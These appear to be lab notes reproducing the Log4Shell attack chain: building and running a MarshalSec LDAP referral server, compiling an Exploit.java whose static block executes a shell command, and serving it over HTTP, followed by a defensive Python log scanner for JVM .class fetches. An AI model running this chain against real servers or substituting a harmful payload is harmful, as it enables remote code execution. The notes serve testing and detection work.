Log4J Shenanigans
The first PoC was found at https://github.com/tangxiaofeng7/apache-log4j-poc.git, which no longer exists, thanks GitHub!
I tested this with Java version:
openjdk version "1.8.0_312"
OpenJDK Runtime Environment (build 1.8.0_312-8u312-b07-0ubuntu1~20.04-b07)
OpenJDK 64-Bit Server VM (build 25.312-b07, mixed mode)
Once in the environment, ensure that MarshalSec has been copied over; if not, download it:
git clone https://github.com/mbechler/marshalsec.git
cd marshalsec
mvn clean package -DskipTests
Run it, probably in screen:
screen java -cp ./target/marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://localhost:8888/#Exploit"
Create the exploit and compile it:
javac Exploit.java
// Exploit.java
class Exploit {
    // The static initializer runs as soon as the JVM loads this class.
    static {
        try { Runtime.getRuntime().exec("touch /tmp/pwned"); } catch (Exception e) {}
    }
}
Run your web server:
screen python -m SimpleHTTPServer 8888
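
On the defender's side, the class fetch from the web server is the step that stands out in logs: the JVM requests /Exploit.class below the codebase URL, and Java's built-in HTTP client sends "Java/<version>" as its default User-Agent. The Python below is an added example, not part of the original notes; it assumes proxy or web-server logs in Combined Log Format, the sample lines are constructed, and class_path / find_class_fetches are hypothetical names.

```python
import re

# Combined Log Format, as written by many web servers and egress proxies (assumed here).
LINE_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"[^"]*" "(?P<ua>[^"]*)"$'
)

# Constructed sample lines, not captured traffic.
SAMPLE_LOG = [
    '10.0.0.5 - - [10/Dec/2021:12:00:01 +0000] "GET /Exploit.class HTTP/1.1" 200 312 "-" "Java/1.8.0_312"',
    '10.0.0.7 - - [10/Dec/2021:12:00:02 +0000] "GET /index.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [10/Dec/2021:12:00:03 +0000] "GET /lib/Foo.class HTTP/1.1" 404 0 "-" "curl/7.68.0"',
    '10.0.0.5 - - [10/Dec/2021:12:00:04 +0000] "GET /maven2/a.jar HTTP/1.1" 200 2048 "-" "Java/1.8.0_312"',
]

def class_path(codebase_arg):
    """Turn a 'URL#ClassName' codebase argument into the path the JVM requests."""
    base, sep, cls = codebase_arg.partition("#")
    if not sep or not cls or not base.endswith("/"):
        raise ValueError("expected a codebase of the form http://host:port/dir/#ClassName")
    path = "/" + base.split("://", 1)[-1].partition("/")[2]
    return path + cls.replace(".", "/") + ".class"

def find_class_fetches(lines, watch_path=None):
    """Return parsed entries where a Java HTTP client requested a .class file."""
    hits = []
    for line in lines:
        m = LINE_RE.match(line.strip())
        if not m:
            continue  # not Combined Log Format; skip rather than guess
        path = m["path"].split("?", 1)[0]
        if m["ua"].startswith("Java/") and path.endswith(".class"):
            hits.append({"src": m["src"], "ts": m["ts"], "path": path,
                         "status": int(m["status"]), "ua": m["ua"],
                         "matches_watch": path == watch_path})
    return hits

if __name__ == "__main__":
    # Codebase argument as used in these notes.
    watch = class_path("http://localhost:8888/#Exploit")
    for hit in find_class_fetches(SAMPLE_LOG, watch):
        print(hit)
```

A hit means a JVM on the source host pulled bytecode over HTTP, which is worth investigating even when the path differs from the one being watched.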